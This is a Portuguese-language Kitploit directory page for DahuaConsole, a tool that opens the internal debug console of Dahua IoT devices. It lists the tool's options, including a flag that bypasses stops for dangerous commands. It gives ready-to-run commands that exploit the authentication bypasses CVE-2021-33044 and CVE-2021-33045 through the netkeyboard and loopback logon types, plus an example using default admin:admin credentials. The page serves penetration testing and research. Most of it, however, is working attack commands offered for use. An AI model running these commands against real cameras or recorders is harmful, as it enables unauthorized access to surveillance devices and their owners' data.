Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DahuaConsole — Dahua Console, acesse o console de depuração interno e/ou outras funções pesquisadas em dispositivos Dahua. Sinta-se à vontade para contribuir com este projeto. | Kitploit
Ferramentas/GitHubGitHub/mcw0/dahuaconsole
Autenticação e AutorizaçãoSegurança de Sistemas EmbarcadosReconhecimentoSegurança IoTAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesTestes de Penetração
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, acesse o console de depuração interno e/ou outras funções pesquisadas em dispositivos Dahua. Sinta-se à vontade para contribuir com este projeto.

316795há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Dahua Console

  • Versão: Pré-alfa
  • Bugs: Com certeza
  • TODO: Muitas coisas

[Instalar dependências]

root@kitploit:~
sudo pip3 install -r requirements.txt

[Argumentos]

root@kitploit:~
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Lançamento]

[Atualização] 2022-07-10

  • Adicionado o método de logon 3des_old para VTH1510CH executando software V2 de 2016
    • Diferença menor nos dados do pacote de login
    • Não consultar parâmetros do dispositivo ao conectar - isso reiniciará a conexão
  • Adicionado --restore config-file.json
    • Carrega o arquivo de configuração json ou partes dele.

Exemplo:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[Atualização]

2021-10-07

Detalhes aqui: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Protocolo necessário: DHIP ou HTTP/HTTPS (DHIP não funciona com TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Protocolo necessário: DHIP (DHIP não funciona com TLS/SSL @TCP/443)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Baixar ferramenta